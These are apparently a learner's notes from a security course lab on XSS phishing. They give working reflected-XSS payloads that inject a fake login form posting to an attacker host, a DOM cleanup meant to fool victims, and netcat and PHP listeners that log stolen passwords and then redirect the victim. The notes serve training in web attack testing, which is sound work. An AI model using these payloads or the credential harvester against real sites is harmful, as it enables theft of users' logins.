6 - Phising - JA Smith

# Login Form Injection - Once we identify a working XSS payload, we can proceed to the phishing attack - To perform an XSS phishing attack, we must inject HTML code that displays a login form on the targeted page - This form should send the login information to a server we are listening on, such that once a user attempts to log in, we'd get their credentials - HTML code for a basic login form that dumps to the IP we are listening on ```html <h3>Please login to continue</h3> <form action=http://OUR_IP> <input type="username" name="username" placeholder="Username"> <input type="password" name="password" placeholder="Password"> <input type="submit" name="submit" value="Login"> </form> ``` - Drop the HTML login form into the JS function `document.write()` within a one-liner payload to inject into the vulnerable web page ```javascript document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>'); ``` - In this case, we are exploiting a `Reflected XSS` vulnerability, so we can copy the URL and our XSS payload in its parameters, as we've done in the `Reflected XSS` section, and the page should look as follows when we visit the malicious URL![[images/Pasted image 20251213201600.png]] ## Cleanup - We can see that the URL field is still displayed, which defeats our line of "`Please login to continue`" - So, to encourage the victim to use the login form, we should remove the URL field, such that they may think that they have to log in to be able to use the page. To do so, we can use the JavaScript function `document.getElementById().remove()` function - To find the `id` of the HTML element we want to remove, we can open the `Page Inspector Picker` by clicking [`CTRL+SHIFT+C`] and then clicking on the element we need - As we see in both the source code and the hover text, the `url` form has the id `urlform` ![[images/Pasted image 20251213201700.png]] - We can now use this id with the `remove()` function to remove the URL form ```javascript document.getElementById('urlform').remove(); ``` - Now add this cleanup up section to our above payload ```javascript document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove(); ``` ![[images/Pasted image 20251213201845.png]] - Cleanup the `>` being shown with an HTML opening comment after the XSS payload ```html <!-- ``` ## Setting up a listener - Finally, we need to setup a listener to steal the login credentials when the victim attempts to log in on our injected login form ### Netcat Listener - Simple `netcat` listener ```bash sudo nc -lvnp 80 connect to [10.10.XX.XX] from (UNKNOWN) [10.10.XX.XX] XXXXX GET /?username=test&password=test&submit=Login HTTP/1.1 Host: 10.10.XX.XX <SNIP> ``` - As we can see, we can capture the credentials in the HTTP request URL (`/?username=test&password=test`). If any victim attempts to log in with the form, we will get their credentials - However, as we are only listening with a `netcat` listener, it will not handle the HTTP request correctly, and the victim would get an `Unable to connect` error, which may raise some suspicions ### PHP Listener - Instead, we can use a basic PHP script that logs the credentials from the HTTP request and then returns the victim to the original page without any injections. In this case, the victim may think that they successfully logged in and will use the Image Viewer as intended - Create `index.php` with the below and place in `tmp/tmpserver` ```php <?php if (isset($_GET['username']) && isset($_GET['password'])) { $file = fopen("creds.txt", "a+"); fputs($file, "Username: {$_GET['username']} | Password: {$_GET['password']}\n"); header("Location: http://SERVER_IP/phishing/index.php"); fclose($file); exit(); } ?> ``` - Start php listener - Write the stolen creds to `creds.txt` ```bash mkdir /tmp/tmpserver cd /tmp/tmpserver vi index.php #at this step we wrote our index.php file sudo php -S 0.0.0.0:80 PHP 7.4.15 Development Server (http://0.0.0.0:80) started cat creds.txt Username: test | Password: test ``` # Exercise - Find working XSS payload at `/phishing` and use to prepare a malicious login form - Then steal creds to access `/phishing/login/php` for flag - Ping test![[images/Pasted image 20251213202748.png]] - Fast nmap scan![[images/Pasted image 20251213202802.png]] - Visit page ![[images/Pasted image 20251213202827.png]] - Test basic alert payload - We are getting a dead image and something written to page source ```javascript <script>alert(window.origin)</script> ``` ![[images/Pasted image 20251213203014.png]]![[images/Pasted image 20251213203023.png]] - Run `xsstrike` - Workable payloads indicate that a script payload prepended with `'>` will work here - This is the commonality across workable payloads from `xsstrike` ```bash python xsstrike.py -u "http://10.129.229.208/phishing/index.php?url=%3Cscript%3Ealert%28window.origin%29%3C%2Fscript%3E" ``` ![[images/Pasted image 20251213203515.png]] - Chain the above payload with a basic alert script - Looks like a working XSS payload ```html '><DEtAILS%0aoNPoInTEreNtEr+=+[8].find(confirm)>;<script>alert(window.origin)</script> ``` ![[images/Pasted image 20251213204218.png]]![[images/Pasted image 20251213204224.png]] - Let's build a payload with a login form ```html '><DEtAILS%0aoNPoInTEreNtEr+=+[8].find(confirm)>;<script>alert(document.write('<h3>Please login to continue</h3><form action=http://10.10.14.200><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>'))</script> ``` - Produces an ugly page but works ![[images/Pasted image 20251213204631.png]] - Try cleaning up and removing alert - Page looks super clean; no strays html code being presented ```html '><script>document.write('<h3>Please login to continue</h3><form action=http://10.10.14.200><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();</script> <!-- ``` ![[images/Pasted image 20251213205645.png]] - Try sending with `netcat listener` - URL sent![[images/Pasted image 20251213210040.png]] - Nothing on the listener![[images/Pasted image 20251213210050.png]] - Setup a php listener - create `/tmp/tmpserver` directory and `index.php` file therewithin using the below php code ![[images/Pasted image 20251213210123.png]] ```php <?php if (isset($_GET['username']) && isset($_GET['password'])) { $file = fopen("creds.txt", "a+"); fputs($file, "Username: {$_GET['username']} | Password: {$_GET['password']}\n"); header("Location: http://10.129.229.208/phishing/index.php"); fclose($file); exit(); } ?> ``` - URL sent again and we have more info with a php listener ![[images/Pasted image 20251213210247.png]]![[images/Pasted image 20251213210257.png]] - Cat `creds.txt` ![[images/Pasted image 20251213210323.png]] - Attempt to login for flag > got em! ![[images/Pasted image 20251213210355.png]]